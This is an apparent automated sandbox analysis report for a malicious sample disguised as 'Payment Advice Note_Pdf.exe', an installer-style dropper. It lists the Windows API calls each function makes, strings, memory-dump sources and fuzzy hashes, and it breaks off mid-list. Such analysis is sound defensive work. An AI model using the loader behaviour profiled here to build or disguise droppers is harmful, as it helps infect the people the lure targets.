Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Function 00401FC3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 0040517E: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
Part of subcall function 0040517E: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00403160,00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000), ref: 004051D9
Part of subcall function 0040517E: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll), ref: 004051EB
Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Strings

0;\, xrefs: 00402041

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: 0;\
API String ID: 334405425-2235944549
Opcode ID: 3672532d6edb3d9d524956054fd165358e4648018b9f4ba76dc5a7b95a7f3ff0
Instruction ID: 21b843afec6b7294a3944f79e0bc8b5a0bfae5b7739fd4420ef7f1bee797e933
Opcode Fuzzy Hash: 3672532d6edb3d9d524956054fd165358e4648018b9f4ba76dc5a7b95a7f3ff0
Instruction Fuzzy Hash: D0219531904219FBCF20AFA5CE48A9E7EB1AF00354F60427BF500B51E1C7B98E81DA5E

Function 00405EEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615F,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F16
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,0040615F,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F37
RegCloseKey.KERNELBASE(?,?,0040615F,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F5A

Strings

Call, xrefs: 00405EEF

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
Instruction ID: c601889377c76b9115debbe7433e53646a10130b96f6f591fa827391142cde11
Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
Instruction Fuzzy Hash: 26010C3255020AEADB218F65ED09E9B3BACEF44350B004026F919D6260D735D964DFA5

Function 00405C23 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C41
GetTempFileNameW.KERNELBASE(00409300,?,00000000,?,?,?,00000000,00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00405C5C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C28
nsa, xrefs: 00405C30

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
Instruction ID: 4fdac09ee551a982241d11f866b864b283b1b610f450d112551ccb25b2c02e5c
Opcode Fuzzy Hash: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
Instruction Fuzzy Hash: 0EF03676B04208BFEB108F55DD49E9BB7ADEB95750F10403AF901F7150E6B0AE548758

Function 00406389 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063A0
wsprintfW.USER32 ref: 004063DB
LoadLibraryW.KERNELBASE(?), ref: 004063EB

Strings

%s%S.dll, xrefs: 004063D5

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
Instruction ID: 006adf5c24d44cc190f28e383f23d96ea846dcb1794efbef959ff2cbc64c9496
Opcode Fuzzy Hash: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
Instruction Fuzzy Hash: D6F09030910119EBDB14AB68DD4DEAB366CAB00304F104476A906F21E1E77CEA68CBE9

Function 00401B37 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(005C3B30), ref: 00401BA7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9

Strings

Call, xrefs: 00401B5E, 00401B64, 00401B7E
0;\, xrefs: 00401B3A, 00401B6A, 00401B79, 00401BA2, 00401BCD, 00401BD4

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$AllocFree
String ID: 0;\$Call
API String ID: 3394109436-1216242664
Opcode ID: c75ea88796058ca8b22c76bcb72d404b7a86f9b33cc07dbe0f48447b8f38d296
Instruction ID: 6437723b9896d782a6b7fabab6bc3621d1df67fb8e76a078729fc3794235ac76
Opcode Fuzzy Hash: c75ea88796058ca8b22c76bcb72d404b7a86f9b33cc07dbe0f48447b8f38d296
Instruction Fuzzy Hash: 5D219672610102ABCB20EFA4CD8595EB7F5EF44314725403BF606B72D1DB7898519F9D

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040517E: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
Part of subcall function 0040517E: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00403160,00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000), ref: 004051D9
Part of subcall function 0040517E: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll), ref: 004051EB
Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239

Part of subcall function 004056FF: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
Part of subcall function 004056FF: CloseHandle.KERNEL32(00409300), ref: 00405735

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 71ab5d970687addce1d4ab6defce77d0135f80e95763eac2ef35eb16aab260c5
Instruction ID: f6705c9319aae76dbd7499045e6368890872edf6032e54a723c1862b254634bc
Opcode Fuzzy Hash: 71ab5d970687addce1d4ab6defce77d0135f80e95763eac2ef35eb16aab260c5
Instruction Fuzzy Hash: 7611A131900108EBCF21AFA1CD8499E7AB6EB04314F24407BF601B61E1C7798A819B9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405A7E: CharNextW.USER32(?,?,00424F10,00409300,00405AF2,00424F10,00424F10, 4<v,?,C:\Users\user\AppData\Local\Temp\,00405830,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 00405A8C
Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 0040564D: CreateDirectoryW.KERNELBASE(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\toenailed\quoteworthy\Atoning,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\toenailed\quoteworthy\Atoning, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\toenailed\quoteworthy\Atoning
API String ID: 1892508949-3254341927
Opcode ID: dd004403bb78615ebe310ef398b070af55ffdf45b6279b398ddf670e6eb8005a
Instruction ID: 9984d83288963ddb5bfb53596c8c9f6ed7fbdeacdcadece23b283b8c4b9f7bd6
Opcode Fuzzy Hash: dd004403bb78615ebe310ef398b070af55ffdf45b6279b398ddf670e6eb8005a
Instruction Fuzzy Hash: 70119331504505EBCF206FA48D4199F3AB1EF44368B24097BEA05B61F2D63A4A819E5E

Function 004056FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
CloseHandle.KERNEL32(00409300), ref: 00405735

Strings

Error launching installer, xrefs: 00405712

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
Instruction ID: 0e3d6bea0253e84bb75e95f5fd13ebb7f1c25267a9e23a2e11a0c59c818b3a51
Opcode Fuzzy Hash: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
Instruction Fuzzy Hash: A1E0BFB4A50209BFEB10AB64ED45F7B77ADE704604F408521BD10F6190D774A9118A79

Function 00406B18 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
Instruction ID: 5fe4abb7369df3af91b149f2edb7ea720d50bcc67b973f9abb1089395dd24c70
Opcode Fuzzy Hash: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
Instruction Fuzzy Hash: C0A14471E00229CBDF28CFA8C8546ADBBB1FF44305F11856AD956BB281C7785A96CF44

Function 00406D19 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
Instruction ID: 7dc68a506d8d0f3fe9b520a6289ddaa7cfd75a66a39107a8603bac83b987cce9
Opcode Fuzzy Hash: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
Instruction Fuzzy Hash: 58912370D00229CBDF28CFA8C854BADBBB1FF44305F15816AD956BB291C7789A96CF44

Function 00406A2F Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
Instruction ID: aa61b8b4d6b896fc10b82c5715850ba22d426d73d4dcb40af3c311b95fbd5bbf
Opcode Fuzzy Hash: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
Instruction Fuzzy Hash: 1B815671E00229CFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7789A96CF54

Function 00406534 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
Instruction ID: 6afa8d85982321809285efd67767f231e28451523f56623c0a237c64ba690010
Opcode Fuzzy Hash: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
Instruction Fuzzy Hash: 7E816731E00229DBDF24CFA9D844BADBBB0FB44305F11816AE856BB2C0C7785A96DF44

Function 00406982 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
